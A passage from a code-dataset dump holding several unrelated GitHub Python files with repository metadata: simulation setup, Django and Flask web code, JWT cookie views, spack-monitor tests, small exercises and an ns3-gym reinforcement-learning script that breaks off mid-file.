= f)\n\n # Generate *.sh file needed for cluster to run sims\n if write_infiles:\n command = os.path.join(PATH, directory + \".sh\")\n with open(command,\"w\") as g:\n g.write(\"#!/bin/bash\\n\")\n g.write(\"cd \" + os.path.join(PATH, directory) + \"\\n\") # Change dir to where sim is\n g.write(\"vplanet vpl.in\\n\") # Run sim command!\n\n # Now give that .sh file execute permissions\n st = os.stat(command)\n os.chmod(command, st.st_mode | stat.S_IEXEC)\n\n # Save file name for later...\n runfile_names.append(command)\n# end for loop\n\n# Write all runfile names to file needed for cluster\nif write_infiles:\n with open(os.path.join(PATH, \"vplArgs.txt\"), 'w') as f:\n for line in runfile_names:\n f.write(line + \"\\n\")\n\n# Save the distributions?\ncols = [\"primary_rot\",\"primary_mass\"]\n\n# Put data into a pandas dataframe\ndf = percentile_list = pd.DataFrame(np.column_stack([pri_rot,pri_mass]), columns=cols)\n\n# Dump it into a CSV since we'll use < 50,000 samples and this is good enough\nif save_dist:\n df.to_csv(os.path.join(PATH,\"mcSingle_distributions.csv\"))\n\n# Visualize the distributions?\nif show_plots:\n import matplotlib\n matplotlib.use(\"Agg\")\n import matplotlib.pyplot as plt\n\n fig, ax = plt.subplots(figsize=(18,16))\n\n df.hist(ax=ax, bins=\"auto\")\n fig.tight_layout()\n fig.savefig(os.path.join(PATH,\"dist_hist.pdf\"), bbox_inches=\"tight\")\n# Done!\n","repo_name":"dflemin3/sync","sub_path":"Scripts/setupMCSingle.py","file_name":"setupMCSingle.py","file_ext":"py","file_size_in_byte":4403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"12336463101","text":"from rest_framework import serializers\nfrom rest_framework_gis.serializers import GeoFeatureModelSerializer\n\nfrom sites.models import WorldBorder, Company, Site\n\n\nclass 
WorldBorderSerializer(GeoFeatureModelSerializer):\n class Meta:\n model = WorldBorder\n geo_field = \"mpoly\"\n\n fields = \"__all__\"\n\n\nclass CompanySerializer(serializers.ModelSerializer):\n class Meta:\n model = Company\n\n fields = \"__all__\"\n\n\nclass SiteSerializer(GeoFeatureModelSerializer):\n created_by = serializers.CharField(source='created_by.id', read_only=True)\n updated_by = serializers.CharField(source='updated_by.id', read_only=True, allow_null=True)\n country = serializers.CharField(source='country.name', read_only=True)\n\n class Meta:\n model = Site\n geo_field = \"position\"\n bbox_geo_field = \"mpoly\"\n\n fields = \"__all__\"\n","repo_name":"tomashchuk/geo_in_terra","sub_path":"sites/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42702920775","text":"# Python program to find maximum product subarray \nimport sys\n \n# Function for maximum product \ndef max_product(arr, n):\n \n # Initialize maximum products in forward and \n # backward directions \n max_fwd = -sys.maxsize -1\n max_bkd = -sys.maxsize -1 \n \n # Initialize current product \n max_till_now = 1 \n \n # max_fwd for maximum contiguous product in \n # forward direction \n # max_bkd for maximum contiguous product in \n # backward direction \n # iterating within forward direction in array \n for i in range(n): \n \n # if arr[i]==0, it is breaking condition \n # for contiguos subarray \n max_till_now = max_till_now * arr[i]\n if (max_till_now == 0):\n max_till_now = 1; \n continue\n \n if (max_fwd < max_till_now): #update max_fwd \n max_fwd = max_till_now \n \n \n max_till_now = 1 \n \n # iterating within backward direction in array \n for i in range(n-1,-1,-1):\n max_till_now = max_till_now * arr[i] \n \n if (max_till_now == 0): \n max_till_now = 1\n continue \n \n # update max_bkd \n if (max_bkd < max_till_now) : \n max_bkd = max_till_now \n \n # return max of max_fwd and max_bkd \n res = max(max_fwd, max_bkd) \n \n # Product should not be nagative. 
\n # (Product of an empty subarray is \n # considered as 0) \n return max(res, 0) \n\n \n# Driver Program to test above function \n \narr = [-1, -2, -3, 4] \nn = len(arr) \nprint(max_product(arr, n))\n\n ","repo_name":"YatinGupta777/Python-Programs","sub_path":"Gfg/maximum-product-subarray-set-2-using-two-traversals.py","file_name":"maximum-product-subarray-set-2-using-two-traversals.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41908348567","text":"# Importing the necessary libraries in to the environment\r\nimport sys\r\nimport flask\r\nfrom flask import request, jsonify,make_response\r\nimport uuid\r\nfrom flask import abort\r\nimport mysql.connector\r\n\r\n# Setting the environment values for Flask\r\napp = flask.Flask(__name__)\r\napp.config[\"DEBUG\"] = True\r\napp.config['RESTFUL_JSON'] = {\"ensure_ascii\": False}\r\n\r\n# Application to route if the url satisfies the below condition ; method to capture the values and insert into MySQL table\r\n@app.route('/ad/user/<request_id>/serve', methods=['GET'])\r\ndef serve(request_id):\r\n # Initializing MySQL database connection with input from CLI using connector\r\n db = mysql.connector.connect(\r\n host=app.config.get('database_host'),\r\n user=app.config.get('database_username'),\r\n password=app.config.get('database_password'),\r\n database=app.config.get('database_name')\r\n )\r\n \r\n # We are initializing three cursors in order to do three distinct operations simultaneously\r\n db_cursor_ad = db.cursor(buffered=True)\r\n db_cursor_users = db.cursor(buffered=True)\r\n db_cursor_served_ads = db.cursor()\r\n text1=''\r\n \r\n # Checking if id is not from masked users\r\n if request_id != '1111-1111-1111-1111':\r\n # Gathering the arguments from the request\r\n device_t = request.args['device_type']\r\n city_t = request.args['city']\r\n state_t = request.args['state']\r\n user_id = request_id\r\n \r\n # DB select query to capture the users from the request id\r\n db_cursor_users.execute(\"Select * from users where id = %s\",(user_id,))\r\n \r\n # Fetching all the values for the cursors\r\n users = db_cursor_users.fetchall()\r\n \r\n #Looping over user to get the details\r\n for user in users:\r\n target_gen = user[2]\r\n target_age = user[1]\r\n target_income = user[4]\r\n \r\n # DB select query to capture the available ads for the specified condition\r\n select_query_ads = \"\"\"Select distinct text,campaign_id, target_device,cpa,cpc,cpm,target_age_start,target_age_end,target_city,target_state,target_country,target_gender,\r\n target_income_bucket,Date_range_start,Date_range_end ,Time_range_start ,Time_range_end from ads where (target_device='All' or target_device = %s) \r\n and ( (target_city='All' or target_city = %s) and (target_state='All' or target_state = %s)) and (target_country='All' or target_country = %s) and\r\n (Target_gender = %s or Target_gender= 'All') and ((target_age_start >= %s and target_age_end <= %s) or (target_age_start=0 and target_age_end=0))\r\n and (target_income_bucket = %s or target_income_bucket='All') and status = 'ACTIVE' order by cpm desc limit 2\r\n \"\"\"\r\n \r\n # DB execute query to capture the available ads for the specified condition\r\n db_cursor_ad.execute(select_query_ads,(device_t,city_t,state_t,target_gen,target_age,target_age,target_income,))\r\n \r\n # Fetching all the values for the cursors\r\n ads = db_cursor_ad.fetchall()\r\n \r\n # Handling condition to see if there is only one 
ad available for the condition specified\r\n if len(ads)!=2:\r\n for ad in ads:\r\n text1=ad[0]\r\n campaign_id = ad[1]\r\n auc_cpm = ad[5] # Paying the same auction as it is the single winner \r\n auc_cpc = ad[4]\r\n auc_cpa = ad[3]\r\n targ_age_range = {\"start\": ad[6],\"end\": ad[7]} # Clubbing the values in the json format\r\n targ_loc = {\"city\": ad[8],\"state\": ad[9],\"country\": ad[10]} # Clubbing the values in the json format\r\n targ_gen = ad[11]\r\n targ_income = ad[12]\r\n targ_dev = ad[2]\r\n camp_start = ad[13]+\" \"+ad[15] # Clubbing the values in the string format\r\n camp_end = ad[14]+\" \"+ad[16] # Clubbing the values in the string format\r\n # Handling condition to see if there are multiple ads available for the condition specified\r\n else:\r\n text1=ads[0][0]\r\n campaign_id = ads[0][1]\r\n auc_cpm = ads[1][5] # Paying the auction to the second ad winner \r\n auc_cpc = ads[0][4]\r\n auc_cpa = ads[0][3]\r\n targ_age_range = {\"start\": ads[0][6],\"end\": ads[0][7]} # Clubbing the values in the json format\r\n targ_loc = {\"city\": ads[0][8],\"state\": ads[0][9],\"country\": ads[0][10]} # Clubbing the values in the json format\r\n targ_gen = ads[0][11]\r\n targ_income = ads[0][12]\r\n targ_dev = ads[0][2]\r\n camp_start = ads[0][13]+\" \"+ads[0][15] # Clubbing the values in the string format\r\n camp_end = ads[0][14]+\" \"+ads[0][16] # Clubbing the values in the string format\r\n \r\n # Checking if id is a masked users \r\n else:\r\n # Gathering the arguments from the request\r\n device_t = request.args['device_type']\r\n city_t = request.args['city']\r\n state_t = request.args['state']\r\n user_id = request_id\r\n \r\n select_query_ads = \"\"\"Select distinct text,campaign_id, target_device,cpa,cpc,cpm,target_age_start,target_age_end,target_city,target_state,target_country,\r\n target_gender,target_income_bucket,Date_range_start,Date_range_end ,Time_range_start ,Time_range_end \r\n from ads where (target_device='All' or target_device = %s) and (target_city='All' or target_city = %s) \r\n and (target_state='All' or target_state = %s)and (target_country='All' or target_country = %s) and status = 'ACTIVE' order by cpm desc limit 2\r\n \"\"\"\r\n \r\n # DB select query to capture the available ads for the specified condition\r\n db_cursor_ad.execute(select_query_ads,(device_t,city_t,state_t,))\r\n \r\n # Fetching all the values for the cursors\r\n ads = db_cursor_ad.fetchall()\r\n \r\n # Handling condition to see if there is only one ad available for the condition specified\r\n if len(ads)!=2:\r\n for ad in ads:\r\n text1=ad[0]\r\n campaign_id = ad[1] # Paying the same auction as it is the single winner \r\n auc_cpm = ad[5]\r\n auc_cpc = ad[4]\r\n auc_cpa = ad[3]\r\n targ_age_range = {\"start\": ad[6],\"end\": ad[7]} # Clubbing the values in the json format\r\n targ_loc = {\"city\": ad[8],\"state\": ad[9],\"country\": ad[10]} # Clubbing the values in the json format\r\n targ_gen = ad[11]\r\n targ_income = ad[12]\r\n targ_dev = ad[2]\r\n camp_start = ad[13]+\" \"+ad[15] # Clubbing the values in the string format\r\n camp_end = ad[14]+\" \"+ad[16] # Clubbing the values in the string format\r\n else:\r\n text1=ads[0][0]\r\n campaign_id = ads[0][1]\r\n auc_cpm = ads[1][5] # Paying the auction to the second ad winner \r\n auc_cpc = ads[0][4]\r\n auc_cpa = ads[0][3]\r\n targ_age_range = {\"start\": ads[0][6],\"end\": ads[0][7]} # Clubbing the values in the json format\r\n targ_loc = {\"city\": ads[0][8],\"state\": ads[0][9],\"country\": ads[0][10]} # Clubbing the values in the 
json format\r\n targ_gen = ads[0][11] \r\n targ_income = ads[0][12]\r\n targ_dev = ads[0][2]\r\n camp_start = ads[0][13]+\" \"+ads[0][15] # Clubbing the values in the string format\r\n camp_end = ads[0][14]+\" \"+ads[0][16] # Clubbing the values in the string format\r\n \r\n # Handling condition to see if there is an ad shown to the user\r\n if len(ads)!=0: \r\n # Deriving the unique id from uuid package\r\n request_id_derived = str(uuid.uuid1())\r\n \r\n # DB insert query for the captured ads for the user\r\n insert_sql = \"\"\"INSERT IGNORE INTO capstone.served_ads(Request_id, Campaign_id,User_id,Auction_cpm,Auction_cpc,Auction_cpa,Target_age_range,Target_location,Target_gender,Target_income_bucket,Target_device_type,Campaign_start_time,Campaign_end_time,Time_stamp) \\\r\n VALUES (%s, %s,%s,%s,%s,%s,%s,%s,%s, %s,%s,%s,%s,%s)\"\"\"\r\n \r\n # Insert Query value to pass in to insert query for served_ads table\r\n insert_val = (request_id_derived, campaign_id,user_id,auc_cpm,auc_cpc,auc_cpa,str(targ_age_range),str(targ_loc),targ_gen,targ_income,targ_dev,camp_start,camp_end,\"\")\r\n \r\n # Executing the query to insert in to served_ads table\r\n db_cursor_served_ads.execute(insert_sql, insert_val)\r\n \r\n # Commiting the DB in order to values get reflected instantly in the table\r\n db.commit()\r\n \r\n # Printing the values captured in the console\r\n print(str(request_id_derived)+\" | \"+str(campaign_id) +\" | \"+str(user_id) +\" | \"+'{:.12f}'.format(auc_cpm) +\" | \"+str(auc_cpc) +\" | \"+str(auc_cpa) +\" | \"+str(targ_age_range) +\" | \"+str(targ_loc) +\" | \"+str(targ_gen) +\" | \"+str(targ_income) +\" | \"+str(targ_dev) +\" | \"+str(camp_start) +\" | \"+str(camp_end) +\" | 0000-00-00 00:00:00\")\r\n # Handling condition to see if no ad shown to the user \r\n else:\r\n print(\"Sorry!!! No Ads Available to show\")\r\n \r\n # Closing the DB Connection\r\n db.close()\r\n \r\n # Returning the values with text and request_id\r\n return jsonify({\"text\": text1,\"request_id\": request_id}) \r\n\r\n# Defining the main method\r\nif __name__ == \"__main__\":\r\n# Validate Command line arguments\r\n if len(sys.argv) != 6:\r\n print(\"Usage: ad_server.py <database_host> <database_username> <database_password> <database_name> <flask_app_port>\")\r\n exit(-1)\r\n \r\n # Captured the values from CLI in to the variables to pass it to initiate method\r\n app.config['database_host'] = sys.argv[1]\r\n app.config['database_username'] = sys.argv[2]\r\n app.config['database_password'] = sys.argv[3]\r\n app.config['database_name'] = sys.argv[4]\r\n \r\n # Processing using exception handling in order to throw an error if it occurs\r\n try:\r\n app.run(host=sys.argv[1], port=sys.argv[5])\r\n # Will exit the program if we hit ctrl+c \r\n except KeyboardInterrupt:\r\n print('Keyboard Interrupt detected!!! 
(ctrl+c) hitted, exiting the program...')\r\n \r\n ","repo_name":"sathyarviswanath/Data-Engineering","sub_path":"ad_server.py","file_name":"ad_server.py","file_ext":"py","file_size_in_byte":10351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36913521666","text":"#!/usr/bin/python3\n#\n#\n\nimport os\nimport json\nimport mkisofs\n\ndef get_files():\n\tfiles = {}\n\treturn files\n\ndef pxe(bootserver):\n\tisolinuxtxtnet = \"\"\n\treturn isolinuxtxtnet\n\ndef autoseed(hostdata, tempdir, services):\n\t## generate configfiles ##\n\tos.system(\"mkdir -p \" + tempdir + \"/files/etc/sysconfig/network-scripts/\")\n\tdns = \"\"\n\tresolv = \"search \" + hostdata[\"domainname\"] + \"\\n\"\n\tfor nameserver in hostdata[\"network\"][\"nameservers\"]:\n\t\tresolv += \"nameserver \" + nameserver + \"\\n\"\n\t\tif dns == \"\":\n\t\t\tdns = nameserver\n\twith open(tempdir + \"/files/etc/resolv.conf\", \"w\") as ofile:\n\t\tofile.write(resolv)\n\thostname = hostdata[\"hostname\"] + \".\" + hostdata[\"domainname\"] + \"\\n\"\n\twith open(tempdir + \"/files/etc/hostname\", \"w\") as ofile:\n\t\tofile.write(hostname)\n\tfor interface in hostdata[\"network\"][\"interfaces\"]:\n\t\tif \"ipv4\" in hostdata[\"network\"][\"interfaces\"][interface]:\n\t\t\tfor ipv4 in hostdata[\"network\"][\"interfaces\"][interface][\"ipv4\"]:\n\t\t\t\tifcfg = \"#UUID=\\\"\\\"\\n\"\n\t\t\t\tifcfg += \"DNS1=\\\"\" + dns + \"\\\"\\n\"\n\t\t\t\tifcfg += \"IPADDR=\\\"\" + ipv4[\"address\"] + \"\\\"\\n\"\n\t\t\t\tifcfg += \"GATEWAY=\\\"\" + hostdata[\"network\"][\"gateway\"] + \"\\\"\\n\"\n\t\t\t\tifcfg += \"NETMASK=\\\"\" + ipv4[\"netmask\"] + \"\\\"\\n\"\n\t\t\t\tifcfg += \"BOOTPROTO=\\\"static\\\"\\n\"\n\t\t\t\tifcfg += \"DEVICE=\\\"\" + interface + \"\\\"\\n\"\n\t\t\t\tifcfg += \"ONBOOT=\\\"yes\\\"\\n\"\n\t\t\t\tifcfg += \"IPV6INIT=\\\"yes\\\"\\n\"\n\t\t\t\twith open(tempdir + \"/files/etc/sysconfig/network-scripts/ifcfg-\" + interface + \"\", \"w\") as ofile:\n\t\t\t\t\tofile.write(ifcfg)\n\n\n\t## generate setup script ##\n\tsetup = \"#!/bin/sh\\n\"\n\tsetup += \"\\n\"\n\tsetup += \"\\n\"\n\tsetup += \"\\n\"\n\twith open(tempdir + \"/setup.sh\", \"w\") as ofile:\n\t\tofile.write(setup)\n\n\tpostsh = \"\"\n\tpostsh += \"#!/bin/sh\\n\"\n\tpostsh += \"\\n\"\n\tpostsh += \"sed -i \\\"s|^#PermitRootLogin .*|PermitRootLogin yes|g\\\" /etc/ssh/sshd_config\\n\"\n\tpostsh += \"\\n\"\n\tuserflag = False\n\tfor user in hostdata[\"users\"]:\n\t\tif user == \"root\":\n\t\t\tif \"sshpubkey\" in hostdata[\"users\"][user]:\n\t\t\t\tpostsh += \"mkdir -p /root/.ssh\\n\"\n\t\t\t\tpostsh += \"chown root:root /root/.ssh\\n\"\n\t\t\t\tpostsh += \"chmod 700 /root/.ssh\\n\"\n\t\t\t\tpostsh += \"echo \\\"\" + hostdata[\"users\"][user][\"sshpubkey\"] + \"\\\" >> /root/.ssh/authorized_keys\\n\"\n\t\t\t\tpostsh += \"chown root:root /root/.ssh/authorized_keys\\n\"\n\t\t\t\tpostsh += \"chmod 600 /root/.ssh/authorized_keys\\n\"\n\t\t\t\tpostsh += \"\\n\"\n\t\telif userflag == False:\n\t\t\tif \"sshpubkey\" in hostdata[\"users\"][user]:\n\t\t\t\tpostsh += \"mkdir -p /home/\" + user + \"/.ssh\\n\"\n\t\t\t\tpostsh += \"chown \" + user + \":\" + user + \" /home/\" + user + \"/.ssh\\n\"\n\t\t\t\tpostsh += \"chmod 700 /home/\" + user + \"/.ssh\\n\"\n\t\t\t\tpostsh += \"echo \\\"\" + hostdata[\"users\"][user][\"sshpubkey\"] + \"\\\" >> /home/\" + user + \"/.ssh/authorized_keys\\n\"\n\t\t\t\tpostsh += \"chown \" + user + \":\" + user + \" /home/\" + user + \"/.ssh/authorized_keys\\n\"\n\t\t\t\tpostsh += 
\"chmod 600 /home/\" + user + \"/.ssh/authorized_keys\\n\"\n\t\t\t\tpostsh += \"\\n\"\n\tpostsh += \"\\n\"\n\twith open(tempdir + \"/post.sh\", \"w\") as ofile:\n\t\tofile.write(postsh)\n\n\tif \"iso\" in hostdata:\n\t\tif not os.path.exists(tempdir + \"/auto.iso\"):\n\t\t\t# mod fetch-macOS.py to get the right image without manuel selction\n\t\t\t# ./fetch-macOS.py -h -> isoimages/OSX-BaseSystem.img\n\t\t\t# copy isoimages/OSX-BaseSystem.img tempdir + \"/auto.iso\"\n\t\t\tprint(\"\")\n\n\n\n\n","repo_name":"multigcs/testnetz","sub_path":"systems/osx.py","file_name":"osx.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"71399533371","text":"import DoubleLinkedList as DLList\nimport Functions as F\nimport csv\n\n_par_sigla_pais = {};\n\ndef read_csv_files():\n \"\"\" Ler os dados do ficheiro \"\"\"\n i = 0\n data_list = []\n with open('dados.csv','r') as fp:\n csvreader = csv.reader(fp,delimiter=\";\", quotechar='\"')\n for row in csvreader:\n list = ('|'.join(row)).split('|')\n data_list.append(list)\n _par_sigla_pais[data_list[i][0]] = data_list[i][1]\n i = i + 1\n \"\"\" Retorna toda a informcao do ficheiro numa lista \"\"\"\n return data_list\n\ndef read_inputs():\n data = read_csv_files()\n DList = DLList.DoubleLinkedList()\n Function = F.Functions(1,DList,_par_sigla_pais)\n\n \"\"\" Cada no vai ter informacao sobre um pais \"\"\"\n for i in range(len(data)-1):\n DList.add_end(data[i])\n\n print(\"Search\")\n with open(\"search_country.txt\", \"r\") as f:\n for line in f:\n #print(line[:-1])\n Function.search(line[:-1])\n print(\"Insert\\n\")\n with open(\"insert_country.txt\", \"r\") as f:\n for line in f:\n new_l = line.split(\" \")\n #print(new_l[1][:-1])\n Function.inser_new_country(new_l[0],new_l[1][:-1])\n\n print(\"Remove\\n\")\n with open(\"remove.txt\",\"r\") as f:\n for line in f:\n Function.remove_country(line[:-1])\n\n print(\"Edit\\n\")\n with open(\"edit.txt\",\"r\") as f:\n for line in f:\n new_l = line.split(\"#\")\n print(new_l[0])\n Function.edit(new_l[0],int(new_l[1]),new_l[2][:-1])\n\nif __name__ == '__main__':\n read_inputs()\n","repo_name":"ZeCanelha/AED_PROJECTO1","sub_path":"read_inputs.py","file_name":"read_inputs.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70128753852","text":"from rest_framework import status\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework_simplejwt.views import TokenObtainPairView, TokenRefreshView\nfrom django.conf import settings\nfrom rest_framework_simplejwt.exceptions import InvalidToken, TokenError\nfrom django.urls import reverse\nfrom users.models import User\nfrom django.http import HttpResponse\n\n\nclass CustomTokenObtainPairView(TokenObtainPairView):\n def post(self, request, *args, **kwargs):\n \"\"\"\n setting up two cookies: access and httponly refresh\n formatting response body\n \"\"\"\n response = super().post(request, *args, **kwargs)\n\n response.set_cookie(\n key='access',\n value=response.data['access'],\n expires=settings.SIMPLE_JWT['ACCESS_TOKEN_LIFETIME'],\n secure=settings.SIMPLE_JWT['AUTH_COOKIE_SECURE'],\n httponly=False,\n samesite=settings.SIMPLE_JWT['AUTH_COOKIE_SAMESITE'],\n )\n\n response.set_cookie(\n key='refresh',\n value=response.data['refresh'],\n 
expires=settings.SIMPLE_JWT['ACCESS_TOKEN_LIFETIME'],\n secure=settings.SIMPLE_JWT['AUTH_COOKIE_SECURE'],\n httponly=settings.SIMPLE_JWT['AUTH_COOKIE_HTTP_ONLY'],\n samesite=settings.SIMPLE_JWT['AUTH_COOKIE_SAMESITE'],\n path=reverse('refresh')\n )\n\n response.data = {'access': response.data['access']}\n\n return response\n\n\nclass CustomTokenRefreshView(TokenRefreshView):\n def post(self, request, *args, **kwargs):\n if 'refresh' not in request.COOKIES:\n return Response({'refresh': 'The token has not been sent'}, status=status.HTTP_400_BAD_REQUEST)\n\n serializer = self.get_serializer(data={'refresh': request.COOKIES['refresh']})\n\n try:\n serializer.is_valid(raise_exception=True)\n except TokenError as e:\n raise InvalidToken(e.args[0])\n\n response = Response(serializer.validated_data, status=status.HTTP_200_OK)\n\n response.set_cookie(\n key='access',\n value=serializer.validated_data['access'],\n expires=settings.SIMPLE_JWT['ACCESS_TOKEN_LIFETIME'],\n secure=settings.SIMPLE_JWT['AUTH_COOKIE_SECURE'],\n httponly=False,\n samesite=settings.SIMPLE_JWT['AUTH_COOKIE_SAMESITE']\n )\n\n return response\n\n\nclass LogoutView(APIView):\n def post(self, request):\n response = Response(status=status.HTTP_200_OK)\n\n response.delete_cookie('access',\n samesite=settings.SIMPLE_JWT['AUTH_COOKIE_SAMESITE'])\n response.delete_cookie('refresh',\n samesite=settings.SIMPLE_JWT['AUTH_COOKIE_SAMESITE'],\n path='/api/token/refresh/')\n\n return response\n","repo_name":"k0rog/GGAEKAPP-backend","sub_path":"tokens/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37144366707","text":"\"\"\"\ntest spackmon specs endpoints\n\"\"\"\n\nfrom spackmon.apps.main.models import Spec, Dependency\nfrom spackmon.apps.users.models import User\nfrom django.test import TestCase\n\nimport os\nimport sys\n\n# Add spackmoncli to the path\nbase = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nspackmon_dir = os.path.join(base, \"script\")\nspecs_dir = os.path.join(base, \"specs\")\nsys.path.insert(0, spackmon_dir)\n\n\ntry:\n from spackmoncli import read_json, parse_auth_header, get_basic_auth\nexcept ImportError:\n sys.exit(\n \"Cannot import functions from spackmoncli, \"\n \" make sure script folder is added to Python path.\"\n )\n\n\nclass SimpleTest(TestCase):\n def setUp(self):\n self.password = \"bigd\"\n self.user = User.objects.create_user(\n username=\"dinosaur\", email=\"dinosaur@dinosaur.com\", password=self.password\n )\n\n def test_new_spec(self):\n \"\"\"Test the new spec endpoint. 
This also tests the auth workflow\"\"\"\n\n print(\"Testing NewSpec endpoint /ms1/specs/new/\")\n spec_file = os.path.join(specs_dir, \"singularity-3.8.0.json\")\n spec = read_json(spec_file)\n\n # First attempt without user token should fail\n response = self.client.post(\n \"/ms1/specs/new/\", data={\"spec\": spec[\"spec\"], \"spack_version\": \"1.0.0\"}\n )\n assert response.status_code == 401\n\n # And provide a www-authenticate header\n assert \"www-authenticate\" in response.headers\n h = parse_auth_header(response.headers[\"www-authenticate\"])\n\n assert h.Realm == \"http://testserver/auth/token/\"\n assert h.Scope == \"build\"\n assert h.Service == \"http://testserver\"\n\n # Prepare request to retry\n headers = {\n \"service\": h.Service,\n \"Accept\": \"application/json\",\n \"User-Agent\": \"spackmoncli\",\n \"HTTP_AUTHORIZATION\": \"Basic %s\"\n % get_basic_auth(self.user.username, self.user.token),\n }\n\n auth_response = self.client.get(h.Realm, **headers)\n\n assert auth_response.status_code == 200\n\n # Request the token\n info = auth_response.json()\n token = info.get(\"token\")\n assert token\n\n # Update authorization headers\n headers[\"HTTP_AUTHORIZATION\"] = \"Bearer %s\" % token\n\n # Make sure we have no specs\n assert Spec.objects.count() == 0\n\n # Retry the request with auth headers\n response = self.client.post(\n \"/ms1/specs/new/\",\n data={\"spec\": spec[\"spec\"], \"spack_version\": \"1.0.0\"},\n content_type=\"application/json\",\n **headers\n )\n\n # Was created response is 201\n assert response.status_code == 201\n data = response.json()\n\n # Check the format of the response\n assert data.get(\"message\") == \"success\"\n assert data.get(\"code\") == 201\n\n data = data.get(\"data\")\n assert data.get(\"created\") == True\n\n # The spec is a field of the data\n data = data.get(\"spec\")\n assert data\n\n # Check the response object\n assert data.get(\"full_hash\") == \"36u22fm5i3w2tqyiyje22j6x55emekjw\"\n assert data.get(\"name\") == \"singularity\"\n assert data.get(\"version\") == \"3.8.0\"\n assert data.get(\"spack_version\") == \"1.0.0\"\n\n specs = data.get(\"specs\")\n assert specs\n\n # We should have created one spec\n singularity = Spec.objects.get(full_hash=data.get(\"full_hash\"))\n\n # The list of depdencies should match what is created\n assert singularity.dependencies.count() == len(specs)\n for dep in singularity.dependencies.all():\n assert dep.spec.full_hash in list(specs.values())\n\n # We should be able to retrieve specs by\n hashes = set()\n hashes.add(data.get(\"full_hash\"))\n for spec_name, spec_hash in specs.items():\n spec_obj = Spec.objects.get(full_hash=spec_hash)\n hashes.add(spec_hash)\n\n # Get all spec hashes to compare against top level\n created_hashes = set(Spec.objects.all().values_list(\"full_hash\", flat=True))\n dependency_hashes = created_hashes.difference(hashes)\n\n # A second response should indicate it already exists (200)\n response = self.client.post(\n \"/ms1/specs/new/\",\n data={\"spec\": spec[\"spec\"], \"spack_version\": \"1.0.0\"},\n content_type=\"application/json\",\n **headers\n )\n assert response.status_code == 200\n","repo_name":"spack/spack-monitor","sub_path":"tests/test_specs.py","file_name":"test_specs.py","file_ext":"py","file_size_in_byte":4518,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"34759259379","text":"from tkinter import *\n\ndef left(x):\n x = -10\n y = 0\n c.move(rec, x, y)\n\ndef right(x):\n x = 10\n y = 0\n 
c.move(rec, x, y)\n \ndef up(x):\n x = 0\n y = -10\n c.move(rec, x, y)\n \ndef down(x):\n x = 0\n y = 10\n c.move(rec, x, y)\n\n\nwindow = Tk()\nwindow.title(\"arrow input\")\nwindow.geometry(\"600x500\")\n\n\nc = Canvas(window, width = 600, height = 500, bg = 'blue')\nc.pack()\n\nrec = c.create_rectangle(20,20,40,40, fill = \"red\", outline = \"black\")\n\n\nwindow.bind(\"<Left>\", left)\nwindow.bind(\"<Right>\", right)\nwindow.bind(\"<Up>\", up)\nwindow.bind(\"<Down>\", down)\n\nwindow.mainloop()","repo_name":"abdullahmohamedali/memory-game","sub_path":"applicatoin/python/coupied/TEST.py","file_name":"TEST.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"73167891452","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport csv\nimport gym\nimport numpy as np\nimport sys\n# Add the directory containing the RL algorithms to your path\n#sys.path.insert(1, '<PATH TO RL FOLDER>/rl') # Relative import\nfrom DQN import KerasDQN\nimport matplotlib.pyplot as plt\nimport argparse\nfrom ns3gym import ns3env\n\nfrom ActorCritic import ActorCritic \nfrom PPO import PPO\n\n# --------------------> Save data to csv <--------------------\nsave = True\n\n# --------------------> Initialize environment <--------------------\nparser = argparse.ArgumentParser(description='Start simulation script on/off')\nparser.add_argument('--start',\n type=int,\n default=0,\n help='Start ns-3 simulation script 0/1, Default: 0') # Use 0 if running simulation in different terminal\nparser.add_argument('--iterations',\n type=int,\n default=1,\n help='Number of iterations, Default: 1')\n\nargs = parser.parse_args()\nstartSim = bool(args.start)\niterationNum = int(args.iterations)\niterationNum = 1\n\nport = 5555\nsimTime = 1e4 # seconds\nstepTime = 1 # seconds\nseed = 0\nsimArgs = {\"--simTime\": simTime,\n \"--stepTime\": stepTime,\n \"--testArg\": 123}\ndebug = False\n\nenv = ns3env.Ns3Env(port=port, stepTime=stepTime, startSim=startSim, simSeed=seed, simArgs=simArgs, debug=debug) \n#env = ns3env.Ns3Env() # To run with one terminal\n\nobservation_space = env.observation_space\naction_space = env.action_space\nn_observations = observation_space.shape[0]\n\n# -----------------------> Set up parameters <--------------------------\n# Number of actions for RL model. Don't include the -1 action in the count \n# -1 is passed to by ns3-gym to indicate the RL is not to be used on this step.\nn_actions = 3\nn_agents = 3\n\n# n_inputs = Distance to all other receivers, sinr, interfence-caused, # successful transmissions, tx power, \n# interference-sensed, and buffer size. \nn_inputs = n_agents + 6 \n\nmax_distance = 50 # For normalization\n# -----------------------> End set up parameters <--------------------------\n\n# --------------------> Create Agents <--------------------\n# DQN\nagents = [KerasDQN(n_inputs, n_actions, \n hidden_layer_one_dims=128, \n hidden_layer_two_dims=256,\n batch_size=64,\n epsilon_min=0.05) for _ in range(n_agents)]\n\n# Actor Critic\n\"\"\"\nagents = [ActorCritic(n_inputs, n_actions) for _ in range(n_agents)]\n\"\"\"\n\n\"\"\"\n# PPO\nagents = [PPO(n_inputs, n_actions, 